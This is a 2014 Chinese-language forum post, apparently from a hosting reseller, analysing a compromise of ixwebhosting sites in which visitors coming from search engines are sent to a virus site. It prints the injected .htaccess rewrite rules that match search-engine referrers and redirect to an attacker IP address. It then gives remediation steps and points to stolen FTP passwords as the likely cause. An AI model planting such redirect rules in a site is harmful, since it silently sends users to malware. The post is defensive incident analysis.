|
|
发表于 2014-11-24 03:39:44
|
查看: 1099 |
回复: 2
本帖最后由 黑玫瑰执事 于 2014-11-24 03:41 编辑
安全问题是互联网十分关注的焦点,在以前也介绍过ixwebhosting空间的安全性是很有保障的。它自身的侦察能力和维护能力都是很强的,但在现实中很可能会遇到很棘手的问题。今天就和大家从实例中来分析解决一个棘手的问题。具体情况:当直接进入网站没有问题,但从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。如下图:
分析原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向。
解决办法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
接到IX官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhostin检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件
互联网安全一直是很多人研究的事情,在日益蓬勃的网络世界,发现问题,分析问题,解决问题是我们一直惯用的模式。所以
|
|
